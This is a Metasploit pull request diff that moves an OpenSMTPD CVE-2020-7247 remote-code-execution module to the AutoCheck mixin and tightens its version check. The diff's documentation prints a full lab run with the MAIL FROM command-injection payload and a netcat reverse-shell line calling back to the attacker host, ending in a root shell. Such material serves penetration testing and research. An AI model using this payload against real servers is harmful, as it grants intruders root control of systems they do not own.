### PR TITLE
Use AutoCheck mixin in OpenSMTPD CVE-2020-7247

### DIFF
--- a/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
+++ b/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
@@ -8,10 +8,10 @@ SMTP interaction with OpenSMTPD to execute a command as the root user.
 ### Setup
 
 1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
-2. Install the system, noting the domain name (defaults to `foo.my.domain` in VirtualBox)
+2. Install the system, noting the domain name (defaults to `foo.localdomain` in VMware)
 3. Configure the following settings in `/etc/mail/smtpd.conf`:
   * `listen on all`
-  * `match from any for domain "foo.my.domain" action "local_mail"`
+  * `match from any for domain "foo.localdomain" action "local_mail"`
 4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
 5. Execute `ifconfig` and look for an appropriate target IP
 
@@ -54,34 +54,37 @@ Payload options (cmd/unix/reverse_netcat):
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
 
-msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 192.168.56.133
-rhosts => 192.168.56.133
-msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 192.168.56.1
-lhost => 192.168.56.1
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137
+rhosts => 172.16.249.137
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
 msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
 
-[*] Started reverse TCP handler on 192.168.56.1:4444
-[*] 192.168.56.133:25 - Connecting to OpenSMTPD
-[*] 192.168.56.133:25 - Saying hello and sending exploit
-[*] 192.168.56.133:25 - Expecting: /220.*OpenSMTPD/
-[+] 192.168.56.133:25 - Received: 220 foo.my.domain ESMTP OpenSMTPD
-[*] 192.168.56.133:25 - Sending: HELO oKFMWnrTJZjTbzkGfVMsyDy7pO35ze
-[*] 192.168.56.133:25 - Expecting: /250.*pleased to meet you/
-[+] 192.168.56.133:25 - Received:
-250 foo.my.domain Hello oKFMWnrTJZjTbzkGfVMsyDy7pO35ze [192.168.56.1], pleased to meet you
-[*] 192.168.56.133:25 - Sending: MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;>
-[*] 192.168.56.133:25 - Expecting: /250.*Ok/
-[+] 192.168.56.133:25 - Received:
+[+] mkfifo /tmp/twkfr; nc 172.16.249.1 4444 0</tmp/twkfr | /bin/sh >/tmp/twkfr 2>&1; rm /tmp/twkfr
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] 172.16.249.137:25 - Executing automatic check (disable AutoCheck to override)
+[!] 172.16.249.137:25 - The service is running, but could not be validated.
+[*] 172.16.249.137:25 - Connecting to OpenSMTPD
+[*] 172.16.249.137:25 - Saying hello and sending exploit
+[*] 172.16.249.137:25 - Expecting: /220.*OpenSMTPD/
+[+] 172.16.249.137:25 - Received: 220 foo.localdomain ESMTP OpenSMTPD
+[*] 172.16.249.137:25 - Sending: HELO JijrF2eskbXFfdlaV
+[*] 172.16.249.137:25 - Expecting: /250.*pleased to meet you/
+[+] 172.16.249.137:25 - Received:
+250 foo.localdomain Hello JijrF2eskbXFfdlaV [172.16.249.1], pleased to meet you
+[*] 172.16.249.137:25 - Sending: MAIL FROM:<;for W in a n 0 9 g D 7 N 7 B K R i u V;do read;done;sh;exit 0;>
+[*] 172.16.249.137:25 - Expecting: /250.*Ok/
+[+] 172.16.249.137:25 - Received:
 250 2.0.0 Ok
-[*] 192.168.56.133:25 - Sending: RCPT TO:<root>
-[*] 192.168.56.133:25 - Expecting: /250.*Recipient ok/
-[+] 192.168.56.133:25 - Received:
+[*] 172.16.249.137:25 - Sending: RCPT TO:<root>
+[*] 172.16.249.137:25 - Expecting: /250.*Recipient ok/
+[+] 172.16.249.137:25 - Received:
 250 2.1.5 Destination address valid: Recipient ok
-[*] 192.168.56.133:25 - Sending: DATA
-[*] 192.168.56.133:25 - Expecting: /354 Enter mail.*itself/
-[+] 192.168.56.133:25 - Received:
+[*] 172.16.249.137:25 - Sending: DATA
+[*] 172.16.249.137:25 - Expecting: /354 Enter mail.*itself/
+[+] 172.16.249.137:25 - Received:
 354 Enter mail, end with "." on a line by itself
-[*] 192.168.56.133:25 - Sending:
+[*] 172.16.249.137:25 - Sending:
 #
 #
 #
@@ -97,19 +100,19 @@ msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
 #
 #
 #
-mkfifo /tmp/eizzy; nc 192.168.56.1 4444 0</tmp/eizzy | /bin/sh >/tmp/eizzy 2>&1; rm /tmp/eizzy
-[*] 192.168.56.133:25 - Sending: .
-[*] 192.168.56.133:25 - Expecting: /250.*Message accepted for delivery/
-[+] 192.168.56.133:25 - Received:
-250 2.0.0 ccd8e419 Message accepted for delivery
-[*] 192.168.56.133:25 - Sending: QUIT
-[*] 192.168.56.133:25 - Expecting: /221.*Bye/
-[+] 192.168.56.133:25 - Received:
+mkfifo /tmp/rsnzh; nc 172.16.249.1 4444 0</tmp/rsnzh | /bin/sh >/tmp/rsnzh 2>&1; rm /tmp/rsnzh
+[*] 172.16.249.137:25 - Sending: .
+[*] 172.16.249.137:25 - Expecting: /250.*Message accepted for delivery/
+[+] 172.16.249.137:25 - Received:
+250 2.0.0 5bd4f87d Message accepted for delivery
+[*] 172.16.249.137:25 - Sending: QUIT
+[*] 172.16.249.137:25 - Expecting: /221.*Bye/
+[+] 172.16.249.137:25 - Received:
 221 2.0.0 Bye
-[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:16126) at 2020-02-05 16:16:59 -0600
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:28550) at 2020-02-28 10:28:14 -0600
 
 id
 uid=0(root) gid=0(wheel) groups=0(wheel)
 uname -a
-OpenBSD foo.my.domain 6.6 GENERIC#353 amd64
+OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
 ```

--- a/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
+++ b/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
+  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Expect
 
@@ -56,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = sock.get_once
 
     return CheckCode::Unknown unless res
-    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/
+    return CheckCode::Detected if res =~ /^220.*ESMTP OpenSMTPD/
 
     CheckCode::Safe
   rescue EOFError, Rex::ConnectionError => e
@@ -67,11 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless datastore['ForceExploit']
-      unless check == CheckCode::Detected
-        fail_with(Failure::Unknown, 'Set ForceExploit to override')
-      end
-    end
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
 
     # We don't care who we are, so randomize it
     me = rand_text_alphanumeric(8..42)

--- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
+++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
@@ -7,8 +7,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ManualRanking
 
-  include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
     super(update_info(info,


### PR DESCRIPTION
Also updates the check to be more precise. I had originally copied the `check` method from the Morris worm Sendmail exploit:

```
220 simh Sendmail 5.51/5.17 ready at Wed, 18 Dec 85 11:14:07 PST
```

Note that there was no `ESMTP` string in 1985's Sendmail.

Updates #12889.